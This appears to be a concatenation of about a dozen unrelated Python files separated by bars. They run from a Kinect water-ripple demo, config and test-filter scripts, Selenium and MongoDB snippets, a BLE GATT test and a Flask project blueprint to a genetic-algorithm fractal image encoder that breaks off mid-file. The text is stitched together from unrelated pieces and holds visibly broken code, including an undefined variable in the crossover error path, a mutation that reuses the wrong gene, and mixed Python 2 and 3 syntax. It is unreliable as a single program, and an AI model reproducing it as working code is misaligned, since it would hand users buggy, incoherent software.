if ((y - radius) < 1):
top -= ((y-radius)-1)
if ((x + radius) > CHUNKY[0] - 1):
right -= (x + radius - CHUNKY[0] + 1)
if ((y + radius) > CHUNKY[1] - 1):
bottom -= (y + radius - CHUNKY[1] + 1)
# This draws a large circle in the height map.
# The original version sloped the height on the edges of the circle
# to create a "sineblob", but this was a bit slow and didn't look much
# better than just sticking a large blob in there instead. :-)
for cy in range (top, bottom):
cyq = cy*cy
for cx in range(left, right):
if(cx*cx + cyq < rquad):
h_map[cx+x][cy+y] += height
def gauss_kern(size, sizey=None):
""" Returns a normalized 2D gauss kernel array for convolutions """
size = int(size)
if not sizey:
sizey = size
else:
sizey = int(sizey)
x, y = numpy.mgrid[-size:size+1, -sizey:sizey+1]
g = numpy.exp(-(x**2/float(size) + y**2/float(sizey)))
return g / g.sum()
def draw_cross(x, y):
global height_buffer, hpage, pheight
if x < CHUNKY[0] - 1 and y < CHUNKY[1] - 1 and x > 0 and y > 0:
# Draw a cross in the height map...
height_buffer[hpage][x][y] = pheight
height_buffer[hpage][x+1][y] = pheight >> 1
height_buffer[hpage][x-1][y] = pheight >> 1
height_buffer[hpage][x][y+1] = pheight >> 1
height_buffer[hpage][x][y-1] = pheight >> 1
def blur_image(im, n, ny=None) :
""" blurs the image by convolving with a gaussian kernel of typical
size n. The optional keyword argument ny allows for a different
size in the y direction.
"""
g = gauss_kern(n, sizey=ny)
improc = signal.convolve(im,g, mode='valid')
return(improc)
if __name__ == '__main__':
full_screen = False
draw_skeleton = False
video_display = False
depth_frame_bits = None
display_flags = 0
if full_screen:
display_flags = pygame.FULLSCREEN
screen_lock = thread.allocate()
screen = pygame.display.set_mode(DEPTH_WINSIZE, display_flags, 16)
pygame.display.set_caption('Python Kinect Demo')
skeletons = None
screen.fill(THECOLORS["black"])
kinect = nui.Runtime()
kinect.skeleton_engine.enabled = True
kinect.skeleton_frame_ready += skeleton_frame_ready
kinect.depth_frame_ready += depth_frame_ready
kinect.depth_stream.open(nui.ImageStreamType.Depth, 2, nui.ImageResolution.Resolution640x480, nui.ImageType.Depth)
print('Controls: ')
print(' d - Switch to depth view')
print(' v - Switch to video view')
print(' s - Toggle displaing of the skeleton')
print(' u - Increase elevation angle')
print(' j - Decrease elevation angle')
# main game loop
done = False
texture = pygame.image.load("water.gif")
# Good idea! Fit the texture to the chunky size...
texture = pygame.transform.scale(texture, CHUNKY)
texture_buff = pygame.surfarray.array2d(texture)
texture_buff = texture_buff.flat
# Two blank height maps
height_buffer = [numpy.zeros(CHUNKY, dtype=int), numpy.zeros(CHUNKY, dtype=int)]
# Buffer to draw on...
water_buffer = numpy.zeros(CHUNKY, dtype=int)
# Texture Lookup Table
texture_lut = make_indices_array(CHUNKY)
# Pygame Surface object which will take the surfarray data and be translated into a screen blit...
water_surface = pygame.Surface((CHUNKY[0], CHUNKY[1]), 0, 8)
depth_surface = pygame.Surface(RES, 0, 8)
#screen_surface = pygame.Surface(RES, 0, 16)
# apply the same palette to surface
water_surface.set_palette(texture.get_palette())
grayscale = tuple([(i, i, i) for i in range(255, -1, -1)])
depth_surface.set_palette(grayscale)
#screen_surface.set_palette(texture.get_palette())
# Pointer to the height_buffer we're using...
hpage = 0
# Rain drop locators
x = 80
y = 80
# initial surfer angles and placement...
xang = 0
yang = 0
offset = 0
ox =CHUNKY[0]/2
oy =CHUNKY[1]/2
# Water density - change this for jelly or mud effects
density = 4
# bobble height
pheight = 800
# Strength of the light - increase this for different lighting...
light = 1
# Size of blobs
radius = 15
# Mode 1 = rain (random)
# Mode 2 = Surfer
# Mode 3 = Blob
mode = 0
kernel = gauss_kern(3)
while not done:
# e = pygame.event.wait()
# dispInfo = pygame.display.Info()
pygame.event.pump()
# Check for keyboard input...
keyinput = pygame.key.get_pressed()
# If ESC or "QUIT" events occurred, exit...
if keyinput[K_ESCAPE] or pygame.event.peek(QUIT):
done = True
break
elif keyinput[K_u]:
kinect.camera.elevation_angle = kinect.camera.elevation_angle + 2
elif keyinput[K_j]:
kinect.camera.elevation_angle = kinect.camera.elevation_angle - 2
elif keyinput[K_x]:
kinect.camera.elevation_angle = 2
elif keyinput[K_w]:
mode = 1
elif keyinput[K_s]:
mode = 2
elif keyinput[K_b]:
mode = 3
if mode == 1:
# Make some noise!
# pick a random position for our 'drop'
x = randrange(2,(CHUNKY[0])-2)
y = randrange(2,(CHUNKY[1])-2)
# Add it to the height map we're currently working on...
height_buffer[hpage][x][y] = randrange(1,pheight<<2)
elif mode == 2:
# Surfer mode...
# Calc the new position (could slap this in a table)...
x = ((CHUNKY[0]/2)-10)*sin((xang*DEG2RAD) * 2)
y = ((CHUNKY[1]/2)-10)*cos((yang*DEG2RAD) * 3)
xang += 2
yang += 1
# Draw a cross in the height map...
height_buffer[hpage][int((ox+x))][int((oy+y))] = pheight
height_buffer[hpage][int((ox+x)+1)][int((oy+y))] = pheight >> 1
height_buffer[hpage][int((ox+x)-1)][int((oy+y))] = pheight >> 1
height_buffer[hpage][int((ox+x))][int((oy+y)+1)] = pheight >> 1
height_buffer[hpage][int((ox+x))][int((oy+y)-1)] = pheight >> 1
elif mode == 3:
# Blob mode...
x = randrange(2,(CHUNKY[0])-2)
y = randrange(2,(CHUNKY[1])-2)
# Draw a big blob in the height map
heightBlob(x,y, pheight, radius, height_buffer[hpage])
# Reset the mode. Don't dive into the shallow end.
mode = 0
# Draw the water and smooth the map...
water_buffer = Draw_water(water_buffer, height_buffer[hpage], texture_buff, light-1, texture_lut)
Calc_water(hpage^1, height_buffer, density)
# flip to the 'old' height map...
hpage ^= 1
pygame.surfarray.blit_array(water_surface, water_buffer)
temp = pygame.transform.scale(water_surface, screen.get_size())
temp = temp.convert(16)
if depth_frame_bits:
data = numpy.fromstring(depth_frame_bits, dtype=numpy.uint16)
data &= 8191
data.resize((480, 640))
data -= numpy.min(data.ravel())
data *= float(256) / float(numpy.max(data.ravel()))
data = ndimage.convolve(data, kernel, mode='constant', cval=0.0)
pygame.surfarray.blit_array(depth_surface, data.view(numpy.uint16).transpose())
screen.blit(temp, (0,0))
#screen.blit(depth_surface, (0,0))
screen.blit(depth_surface, (0,0), None, pygame.BLEND_SUB)
pygame.display.update()
|
import configparser
from common.constant import CONF_DIR
import os
#拼接配置文件路径
# conf_file_path = os.path.join(CONF_DIR,'conf.ini')
os.chdir('/Users/tianjianfeng/PycharmProjects/api-test-tian/conf')
cf = configparser.ConfigParser()
# filename = cf.read('conf.ini')
# print(filename)
#写入
# add section 添加section项
# set(section,option,value) 给section项中写入键值对
cf.add_section("mq")
cf.set("mq", "user", "laozhang")
cf.add_section("kafka")
cf.set("kafka", "user", "xiaozhang")
# write to file
with open("test1.ini","w+") as f:
cf.write(f)
|
# Copyright 2022 The Cobalt Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starboard win-win32 Platform Test Filters."""
import logging
import os
from starboard.shared.win32 import test_filters as shared_test_filters
from starboard.tools.testing import test_filter
# pylint: disable=line-too-long
_FILTERED_TESTS = {
'nplb': [
# This single test takes >15 minutes.
'SbPlayerTest.MultiPlayer',
# This test fails on win-win32 devel builds, because the compiler
# performs an optimization that defeats the SB_C_NOINLINE 'noinline'
# attribute.
'SbSystemGetStackTest.SunnyDayStackDirection',
# These tests are failing. Enable them once they're supported.
'MultiplePlayerTests/*beneath_the_canopy_137_avc_dmp*',
'SbMediaSetAudioWriteDurationTests/SbMediaSetAudioWriteDurationTest.WriteContinuedLimitedInput*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.SecondaryPlayerTest/*',
# Failures tracked by b/256160416.
'SbSystemGetPathTest.ReturnsRequiredPaths',
'SbPlayerGetAudioConfigurationTests/*_video_beneath_the_canopy_137_avc_dmp_output_decode_to_texture_*',
'SbPlayerWriteSampleTests/*_video_beneath_the_canopy_137_avc_dmp_output_decode_to_texture_*',
'SbSocketAddressTypes/SbSocketBindTest.RainyDayBadInterface/type_ipv6_filter_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
'SbSocketAddressTypes/SbSocketResolveTest.SunnyDayFiltered/filter_ipv6_type_ipv6',
'SbSocketAddressTypes/SbSocketSetOptionsTest.RainyDayInvalidSocket/type_ipv4',
'SbSocketAddressTypes/SbSocketSetOptionsTest.RainyDayInvalidSocket/type_ipv6',
# Flakiness is tracked in b/278276779.
'Semaphore.ThreadTakesWait_TimeExpires',
# Failure tracked by b/287666606.
'VerticalVideoTests/VerticalVideoTest.WriteSamples*',
# Enable once verified on the platform.
'SbMediaCanPlayMimeAndKeySystem.MinimumSupport',
],
'player_filter_tests': [
# These tests fail on our VMs for win-win32 builds due to missing
# or non functioning system video decoders.
'VideoDecoderTests/VideoDecoderTest.*/beneath_the_canopy_137_avc_dmp_DecodeToTexture*',
'VideoDecoderTests/VideoDecoderTest.*/black_test_avc_1080p_30to60_fps_dmp_DecodeToTexture*',
# PlayerComponentsTests fail on our VMs. Preroll callback is always not called in
# 5 seconds, which causes timeout error.
'PlayerComponentsTests/*',
],
}
# pylint: enable=line-too-long
def CreateTestFilters():
return WinWin32TestFilters()
class WinWin32TestFilters(shared_test_filters.TestFilters):
"""Starboard win-win32 Platform Test Filters."""
def GetTestFilters(self):
"""Gets all tests to be excluded from a unit test run.
Returns:
A list of initialized TestFilter objects.
"""
if os.environ.get('COBALT_WIN_BUILDBOT_DISABLE_TESTS', '0') == '1':
logging.error('COBALT_WIN_BUILDBOT_DISABLE_TESTS=1, Tests are disabled.')
return [test_filter.DISABLE_TESTING]
else:
filters = super().GetTestFilters()
for target, tests in _FILTERED_TESTS.items():
filters.extend(test_filter.TestFilter(target, test) for test in tests)
if os.environ.get('EXPERIMENTAL_CI', '0') == '1':
# Disable these tests in the experimental CI due to pending failures.
experimental_filtered_tests = {
'drain_file_test': [
'DrainFileTest.SunnyDay',
'DrainFileTest.SunnyDayPrepareDirectory',
'DrainFileTest.RainyDayDrainFileAlreadyExists'
]
}
for target, tests in experimental_filtered_tests.items():
filters.extend(test_filter.TestFilter(target, test) for test in tests)
return filters
|
import sys
n = int(sys.stdin.readline())
num = 0
while num*(num +1) // 2 <= n:
num += 1
print(num -1) |
import pymongo
import numpy as np
import matplotlib as plt
client = pymongo.MongoClient('localhost', 27017)
douban = client['douban']
movie_info = douban['movie_info']
for i in movie_info.find({}, {'movie_classify': 1, '_id': 0, 'movie_id': 1}).limit(10):
print(i)
# visiable
def plot_show():
data = movie_info.find({}, {'movie_classify': 1, '_id': 0, 'movie_id': 1})
|
## character_set.py Dana Hughes 28-Aug-2017
##
## Functions for loading in a character set
import pygame
from pygame.locals import *
import os
def load_bitmap(filename, dimensions=(8,16)):
"""
Load in the characters from a bitmap.
NOTE: Currently assumes a 2-bit (BW) bitmap.
filename - path to the bitmap file
dimensions - width x height of individual character in bitmap
"""
# Does the file exist?
if not os.path.exists(filename):
print "File %s does not exist!" % filename
return None
with open(filename) as bitmap_file:
bitmap = pygame.image.load(bitmap_file)
# Extract the characters
characters = []
# How many characters across and down in the image?
char_width, char_height = dimensions
num_x = bitmap.get_width()/ char_width
num_y = bitmap.get_height() / char_height
# Convert the surface to a bit array for easy extraction. Any non-zero bit
# should be set to 1.
bit_array = pygame.surfarray.array2d(bitmap)
bit_array[bit_array > 0] = 1
# Extract the characters - These need to load from left to right, top to bottom,
# hence the hight index first
for j in range(num_y):
y = j*char_height
for i in range(num_x):
x = i*char_width
char = pygame.surfarray.make_surface(bit_array[x:x+char_width,y:y+char_height])
characters.append(char)
return characters
|
from selenium import webdriver
driver = webdriver.Chrome(executable_path=r'C:\Users\Akumar4\Downloads\chromedriver_win32\chromedriver.exe')
driver.get('http://demo.automationtesting.in/FileDownload.html')
driver.maximize_window()
"""
Inorder to download a file in the above website need to enter details in the provided text box then Generate button will be Enabled.
Click on Generate, Download link will be avail for downloading data in a Text file. Similarly for PDF.
"""
driver.find_element_by_id('textbox').send_keys('Download the Text file')
driver.find_element_by_id('createTxt').click()
driver.find_element_by_xpath('//*[@id="link-to-download"]').click()
|
import json
from dataclasses import dataclass
from json import JSONDecodeError
from typing import List
from bs4 import BeautifulSoup
@dataclass
class Schematic:
name: str
rarity: str
stars: str
perks: List[str]
schematic_type: str
material: str
def load_schematics(file) -> List[Schematic]:
schematics = []
soup = parse_schematics(file)
schematic_elements = soup.findAll("div", {"class": "item-wrapper"})
for schematic in schematic_elements:
name = schematic.get('data-name')
rarity = schematic.get('data-rarity')
stars = schematic.get('data-stars')
perks = schematic.get('data-perks')
try:
perks_descriptions = deserialize_perks(perks)
except JSONDecodeError as e:
print(name)
raise e
schematic_type = schematic.get('data-type')
material = schematic.get('data-material')
weapon = Schematic(name=name.strip(),
rarity=rarity,
stars=stars,
perks=perks_descriptions,
schematic_type=schematic_type,
material=material)
schematics.append(weapon)
return schematics
def parse_schematics(file):
html = read_schematics(file)
html = html.replace("&quoquot;", """)
html = html.replace("&qquot;", """)
soup = BeautifulSoup(html, 'html.parser')
return soup
def read_schematics(file: str):
file = open(file, mode='r', encoding="utf-8")
html = file.read()
file.close()
return html
def deserialize_perks(perks) -> List[str]:
try:
data = json.loads(perks)
perks = [d['d'] for d in data]
return perks
except JSONDecodeError as e:
print(perks)
raise e
def print_schematics(schematics: List[Schematic]):
for schematic in schematics:
perks = "|".join(schematic.perks)
print(f"{schematic.name}|{schematic.schematic_type}|{schematic.rarity}|{perks}")
# perks = "\t".join(schematic.perks)
# print(f"{schematic.name}\t{schematic.schematic_type}\t{schematic.rarity}\t{perks}")
def main():
schematics = load_schematics('schematics.html')
print_schematics(schematics)
if __name__ == '__main__':
main()
|
import gc
import machine
import utime
import ubinascii
import uos
from machine import Timer
from L99_BLEGATTS import BLEGATTS
hardware_serial = ubinascii.hexlify(machine.unique_id()).decode()
l99_serial = 'L99-%s' % hardware_serial
def ble_connection_callback(is_connected):
if is_connected:
print("BLE connected")
else:
print("BLE disconnected")
ble = BLEGATTS()
ble.init(advert_name=l99_serial, connect_callback=ble_connection_callback)
ble.addService(service_name='device_info',uuid=6154) \
.addReadChar (name='l99_serial', uuid=0, static_read=l99_serial) \
.addReadChar (name='hardware_serial', uuid=1, static_read=hardware_serial) \
.addReadChar (name='sysname', uuid=2, dynamic_read=lambda cn,id: uos.uname()[0]) \
.addReadChar (name='nodename', uuid=3, dynamic_read=lambda cn,id: uos.uname()[1]) \
.addReadChar (name='release', uuid=4, dynamic_read=lambda cn,id: uos.uname()[2]) \
.addReadChar (name='version_number', uuid=5, dynamic_read=lambda cn,id: uos.uname()[3].split(' on ')[0]) \
.addReadChar (name='version_date', uuid=6, dynamic_read=lambda cn,id: uos.uname()[3].split(' on ')[1]) \
.addReadChar (name='machine', uuid=7, dynamic_read=lambda cn,id: uos.uname()[4]) \
.addReadChar (name='lora_version', uuid=8, dynamic_read=lambda cn,id: uos.uname()[5]) \
.start()
ble.addService(service_name='char_tests',uuid=0) \
.addNotifyChar (name='note1', uuid=0, static_read=0) \
.addReadNotifyChar (name='note2', uuid=1, static_read=0) \
.addReadChar (name='self', uuid=2, dynamic_read=lambda cn,id: cn+str(id)) \
.addReadWriteChar (name='r+w', uuid=3,
dynamic_read=lambda cn,id: char_rw_test_read(cn,id),
dynamic_write=lambda cn,id,val: char_rw_test_write(cn,id,val)) \
.addReadWriteNotifyChar (name='r+w+n', uuid=4,
dynamic_read=lambda cn,id: char_rwn_test_read(cn,id),
dynamic_write=lambda cn,id,val: char_rwn_test_write(cn,id,val)) \
.start()
ble.advertise()
rw_var = 1337
def char_rw_test_read(char_name,char_uuid):
global rw_var
return rw_var
def char_rw_test_write(char_name,char_uuid,char_value):
global rw_var
rw_var = char_value
def char_rwn_test_read(char_name,char_uuid):
global rw_var
return rw_var
def char_rwn_test_write(char_name,char_uuid,char_value):
global rw_var
rw_var = char_value
global ble
ble.setCharValue('char_tests','r+w+n',rw_var) # ain't gonna notify itself
def char_timer(t):
global counter
counter = counter + 1
ble.setCharValue('char_tests','note1',counter)
ble.setCharValue('char_tests','note2',counter) # i can only get one or the other to notify, but not both
counter = 1
timer = Timer.Alarm(handler=char_timer, ms=2000, periodic=True)
'''
try:
while True:
machine.idle()
except:
pass
''' |
from flask import request, redirect, render_template, Blueprint, json, url_for, session, flash
from flask_login import login_required
from project.project_module.forms import AddProject, ShareProjectForm
from project.project_module.models import project_wapper
from project.utils.statics_data import date_in_result, not_in_result
from project.utils.conversions import to_date_time, to_date, with_utf
from project.request_module.apicalls import project_api
project_print = Blueprint('project', __name__, template_folder='templates/project_module')
api = project_api()
@project_print.route('/')
@login_required
def index():
uid_send = dict()
uid_send["uid"] = session['uid']
print(json.dumps(uid_send))
data = api.get_all(session['uid'])
var = list()
try:
var = data['all_projects']
print(var)
except Exception:
pass
return render_template('project_module.html', var=var)
@project_print.route('/new', methods=['GET', 'POST'])
@login_required
def new_project():
form = AddProject()
if request.method == 'POST':
project_ = dict()
project_['project_name'] = form.project_name.data
project_['project_description'] = form.project_description.data
project_['project_starting_date'] = form.project_starting_date.data
project_['project_releasing'] = form.project_releasing.data
project_['customer_name'] = form.customer_name.data
project_['customer_contact'] = form.customer_contact.data
project_['customer_mail'] = form.customer_mail.data
project_['customer_company_name'] = form.customer_company_name.data
project_['customer_site'] = form.customer_site.data
project_['uid'] = session['uid']
project_obj = project_wapper(project_)
print('==>>REQUEST : {}'.format(str(project_obj.__dict__)))
data = api.create(json.dumps(project_obj.__dict__))
print('{} response '.format(data))
if data['status']:
return redirect(url_for('project.index'))
return render_template('new_project.html', form=form)
@project_print.route('/edit/<int:pid>', methods=['GET', 'POST'])
@login_required
def edit(pid):
form = AddProject()
req = {'pid': pid, 'uid': session['uid']}
res = api.view(req)
print('RESPONSE : {}'.format(str(res)))
data = res['all_projects'][0]
if len(res['all_projects']) == 0:
return render_template('project_view.html', data='NO')
if len(data) == 0:
return redirect(url_for('project.index'))
else:
print(type(data))
if request.method == 'GET':
for key, val in data.items():
if key in ['project_name', 'project_description', 'customer_contact', 'customer_company_name',
'customer_site', 'customer_mail', 'customer_name']:
form[key].data = val
if key in ['project_starting_date', 'project_releasing']:
form[key].value = with_utf(to_date(val))
print('KEY >{} {}'.format(type(to_date_time(val)), val))
if request.method == 'POST':
project_ = dict()
for key, val in data.items():
if not key in not_in_result:
project_[key] = form[key].data
project_['uid'] = session['uid']
project_obj = project_wapper(project_)
print('==>>REQUEST : {}'.format(str(project_obj.__dict__)))
up_req = {
'user': req,
'project': project_obj.__dict__
}
print('\n\n------<>{}'.format(up_req))
data = api.save_edited(json.dumps(up_req))
print('{} response '.format(data))
if data['status']:
return redirect(url_for('project.index'))
return render_template('edit_project.html', form=form)
@project_print.route('/view')
@login_required
def project_view():
req = {'pid': request.args.get('pid'), 'uid': session['uid']}
res = api.view(req)
users = api.get_project_users(req)
print('RESPONSE : {}'.format(str(res)))
if len(res['all_projects']) == 0:
return render_template('project_view.html', data='NO')
for x in date_in_result:
res['all_projects'][0][x] = to_date_time(res['all_projects'][0][x])
return render_template('project_view.html', data=res['all_projects'][0], users=users['users'])
@project_print.route('/delete')
@login_required
def delete():
req = {'pid': request.args.get('pid'), 'uid': session['uid']}
res = api.delete(req)
print('RESPONSE : {}'.format(str(res)))
if res['status']:
return redirect(url_for('project.index'))
return redirect(url_for('project.project_view'))
@project_print.route('/share/<int:project_id>', methods=['GET', 'POST'])
@login_required
def share(project_id):
form = ShareProjectForm()
if request.method == 'POST':
req = {'pid': project_id, 'uid': session['uid'], 'mail_id': str(form.mail_id.data)}
res = api.share(req)
print(str(res))
if res['status']:
flash('Project Shared Successfully!')
else:
flash('Project Not Shared!')
return render_template('share_project.html', form=form)
|
from dihedral_transformations import get_dihedrical_transf
from TransformationCodes import rgb2hex
from heapq import heappush, heappop, nlargest
from heapq import merge as merge_heaps
import scipy.ndimage as get_scaled
from PIL import Image, ImageDraw
from multiprocessing import Array
from multiprocessing import Queue
from utils import *
import ctypes, numpy
from numpy import random
# Exception Classes
class MatingError(Exception):
def __init__(self):
self.reason=""
def set_reason(self,reason):
self.reason=reason
class MSEError(Exception):
def __init__(self):
self.reason=""
def set_reason(self,reason):
self.reason=reason
class Generator(multiprocessing.Process):
def __init__(self, work_queue, result_queue, event_start, props):
# Metaproccessed
multiprocessing.Process.__init__(self)
self.work_queue = work_queue
self.result_queue = result_queue
self.State = "Wait"
# Domain specific properties
self.mating_pool = props['S_b']
self.start_calc = event_start
self.N = props['N']; self.h = props['h']; self.w = props['w']
self.P_c = props['P_c']; self.h_dom = props['h_dom']
self.w_dom = props['w_dom']
self.mask_crossover = random.RandomState()
def run(self):
count = 0
while True:
if self.State == 'Wait':
self.start_calc.wait()
self.State = "Calculate"
elif self.State == 'Stop':
break
while self.State == "Calculate":
# get a part
req = self.work_queue.get()
if req == "Stop":
self.State = "Stop"
elif req == "Wait":
self.State = "Wait"
self.result_queue.put("ACK")
else:
try:
result = self.mating(req)
except MatingError, E:
result = E.reason
self.result_queue.put(result)
def mating(self, partition):
offsprings = []
for i in xrange(partition[0],partition[1]):
mating_pool = self.mating_pool[:].split()
idx_chosen_parent_1 = self.rank_selection()-1
idx_chosen_parent_2 = self.rank_selection()-1
try:
parent_1 = mating_pool[idx_chosen_parent_1]
parent_2 = mating_pool[idx_chosen_parent_2]
except:
error = MatingError()
error.set_reason(("Error_on_mating_pool_maybe_indexes",idx_chosen_parent_1,idx_chosen_parent_2, self.mating_pool))
raise error
try:
if random.random()<=self.P_c:
offpring_1, offpring_2 = self.crossover(parent_1, parent_2)
else:
offpring_1, offpring_2 = parent_1, parent_2
except:
error = MatingError()
error.set_reason(("Error_on_crossover",parent1,parent2))
raise error
offsprings.append(offpring_1)
offsprings.append(offpring_2)
return offsprings[0:partition[1]-partition[0]]
def rank_selection(self):
random.seed()
i = 1; chosen = False
while not chosen:
random.seed()
potential = random.randint(1, (self.N/2))
random.seed()
chosen = not random.randint(1, (self.N/2))>potential
return potential
def crossover(self, parent_1, parent_2):
child_1 = ''
child_2 = ''
mask = self.gen_mask_crossover()
for idx, mask_bit in enumerate(mask):
if mask_bit == '0':
child_1 += parent_1[idx]
child_2 += parent_2[idx]
else:
child_1 += parent_2[idx]
child_2 += parent_1[idx]
childs = []
for chromo in [child_1,child_2]:
childs.append(self.consistency_check(chromo))
return childs
def update_P_crossover(self, P_c):
self.P_c = P_c
def gen_mask_crossover(self):
return '{0:021b}'.format(self.mask_crossover.randint(2**21-1))
def consistency_check(self, chrom):
# out of bounds check
w, h = self.w,self.h
w_dom, h_dom = self.w_dom, self.h_dom
gen_x_dom = int(chrom[0:9],2)
gen_y_dom = int(chrom[9:18],2)
return '{0:09b}'.format(min(max(gen_x_dom,0),w-w_dom))+'{0:09b}'.format(min(max(gen_y_dom,0),h-h_dom))+chrom[18:21]
class Mutator(multiprocessing.Process):
def __init__(self, work_queue, result_queue, event_start, props):
multiprocessing.Process.__init__(self)
self.work_queue = work_queue
self.result_queue = result_queue
self.kill_received = False
self.pool = props['pool']
self.start_calc = event_start
self.P_mb = props['P_mb']; self.P_mw = props['P_mw']
self.h = props['h']; self.w = props['w']
self.h_dom = props['h_dom']; self.w_dom = props['w_dom']
self.State = "Wait"
def run(self):
count = 0
while True:
if self.State == 'Wait':
self.start_calc.wait()
self.State = "Calculate"
elif self.State == 'Stop':
break
while self.State == "Calculate":
# get a part
req = self.work_queue.get()
if req == "Stop":
self.State = "Stop"
elif req == "Wait":
self.State = "Wait"
self.result_queue.put("ACK")
elif req == "Update_mrate":
# This is another inner state that holds until
# the mutation parameters are updated
while not self.work_queue.empty(): continue
self.result_queue.put("ACK")
P_m = self.work_queue.get()
self.P_mb = P_m[0]
self.P_mw = P_m[1]
self.result_queue.put("ACK")
self.State = "Wait"
else:
result = []
try:
population = self.pool[:].split()
N = len(population)
best = population[0:N/2]
worst = population[N/2:N]
for chroma in best[req[0]:req[1]]:
result.append(self.mutate_best(chroma))
for chroma in worst[req[0]:req[1]]:
result.append(self.mutate_worst(chroma))
except:
result.append(["Mutation_Error",(population,N)])
self.result_queue.put(result)
def mutate_best(self, chrom):
gen_chrom = chrom
if random.random() <= self.P_mb:
gen_x_dom_HB = chrom[0:5]
gen_y_dom_HB = chrom[9:14]
gen_chrom = gen_x_dom_HB +'{0:04b}'.format(random.randint(2**4-1)) + gen_y_dom_HB +'{0:04b}'.format(random.randint(2**4-1))+chrom[18:21]
return self.consistency_check(gen_chrom)
def mutate_worst(self, chrom):
gen_chrom = chrom
if random.random() <= self.P_mw:
gen_x_dom_LB = chrom[5:9]
gen_y_dom_LB = chrom[14:18]
gen_chrom = '{0:05b}'.format(random.randint(2**5-1)) + gen_x_dom_LB + '{0:05b}'.format(random.randint(2**5-1)) + gen_x_dom_LB +'{0:03b}'.format(random.randint(2**3-1))
return self.consistency_check(gen_chrom)
def consistency_check(self, chrom):
# out of bounds check
w, h = self.w,self.h
w_dom, h_dom = self.w_dom, self.h_dom
gen_x_dom = int(chrom[0:9],2)
gen_y_dom = int(chrom[9:18],2)
return '{0:09b}'.format(min(max(gen_x_dom,0),w-w_dom))+'{0:09b}'.format(min(max(gen_y_dom,0),h-h_dom))+chrom[18:21]
class Fitness_evaluator(multiprocessing.Process):
def __init__(self, work_queue, result_queue, event_start, props):
multiprocessing.Process.__init__(self)
self.start_calc = event_start
self.work_queue = work_queue
self.result_queue = result_queue
self.calc = False
self.kill_received = False
self.ranBlk = 0
self.h = props['h']
self.w = props['w']
self.h_dom = props['h_dom']
self.w_dom = props['w_dom']
self.RanBlockSize = props['RanBlockSize']
self.pool = props['pool']
self.Dom = props['Dom']
# Initial state
self.State = "Wait"
self.ranBlkIter=self.next_rangBlk()
def run(self):
count = 0
while True:
if self.State == 'Wait':
self.start_calc.wait()
self.State = "Calculate"
elif self.State == 'Stop':
break
flag_chRanBlk = False
while self.State == "Calculate":
# get a part
req = self.work_queue.get()
if req == "Next_ranBlk":
if flag_chRanBlk == False:
self.set_rangBlk()
self.result_queue.put("ACK")
flag_chRanBlk = True
else:
# I already done it and I was faster I so have to give it back
# This will happen until my lazy fitness calculator' collegues
# wake up and do their job
self.work_queue.put(req)
elif req == "Stop":
self.State = "Stop"
elif req == "Wait":
self.State = "Wait"
self.result_queue.put("ACK")
else:
result = self.calculate_Population_fitness(self.pool[:].split()[req[0]:req[1]])
self.result_queue.put(result)
def next_rangBlk(self):
for i in xrange (int(self.w/8)):
for j in xrange (int(self.h/8)):
ranBlk = self.Dom[j*self.RanBlockSize[0]:j*self.RanBlockSize[0]+ self.RanBlockSize[0], i*self.RanBlockSize[1]:i*self.RanBlockSize[1]+self.RanBlockSize[1]]
self.ranBlk = rgb2hex(ranBlk.copy())
yield None
def set_rangBlk(self):
self.ranBlkIter.next()
def calculate_Population_fitness(self, part):
# (h,w)
DomBlockSize = (16,16)
RanBlockSize = (8,8)
max_fitness = 1000000000
ranking = []
for chrom in part:
# genes
gen_x_dom = chrom[0:9]
gen_y_dom = chrom[9:18]
gen_flip = chrom[18:21]
# fenotypes
fen_xdom = int(gen_x_dom,2) # 2 for binary representation
fen_ydom = int(gen_y_dom,2)
fen_flip = int(gen_flip,2)
try:
DomBlk = self.Dom[fen_ydom:fen_ydom+DomBlockSize[0] ,fen_xdom:fen_xdom+DomBlockSize[1]]
except:
return "DomBlkError"
try:
DomBlk_hex = rgb2hex(DomBlk.copy())
except:
return "rgb2hexError"
try:
temp = get_scaled.geometric_transform(DomBlk_hex, resize_func, output_shape=RanBlockSize)
except:
return "transformError"
try:
DomBlk_subsampled = get_dihedrical_transf(temp,fen_flip)
except:
return "dihedrTransformError"
#p,q = calc_massic(DomBlk_subsampled,rngBlk)
try:
MSE = self.calculate_mse(DomBlk_subsampled)
except MSEError,E:
return E.reason
try:
rank = min(1/MSE,max_fitness)
except ZeroDivisionError:
rank = max_fitness
heappush(ranking,(rank,chrom))
return ranking
def calculate_mse(self, domBlk_subSmpl):
Error = MSEError()
try:
im1flat_T = domBlk_subSmpl.flatten()
im2flat_T = self.ranBlk.flatten()
im1flat = im1flat_T.copy()
im2flat = im2flat_T.copy()
length = float(len(im1flat))
except:
Error.set_reason(("ran_Blk",self.ranBlk))
raise Error
MSE = 0
for i in xrange(0,int(length)):
pix_1 = im1flat[i]
pix_2 = im2flat[i]
rgb_1 = hex2rgb(pix_1)
rgb_2 = hex2rgb(pix_2)
try:
diff = array(rgb_1)-array(rgb_2)
MSE += reduce(add, map(lambda k: k**2, diff))
except:
Error.set_reason("Reduce")
raise Error
MSE = MSE/(3*length)
return MSE
from numpy import array
class Fractal_encoder():
def __init__(self, image, N_population, N_workers, DomBlockSize, RanBlockSize, props_generator, props_mutator):
self.work_queue = Queue()
self.result_queue = Queue()
self.first_time=True
self.generators = []
self.fit_calculators = []
self.mutators = []
self.Dom = array(image,'ubyte')
self.h, self.w = self.Dom.shape[0:2]
self.DomBlockSize = DomBlockSize
self.RanBlockSize = RanBlockSize
self.N = N_population
# Syncronized elements for population, best clan and worst clan
dummy_pool = numpy.array(''.zfill(N_population*21+N_population-1)).tostring()
self.pool = Array('c', dummy_pool)
dummy_pool_1 = numpy.array(''.zfill((N_population/2)*21+(N_population/2)-1)).tostring()
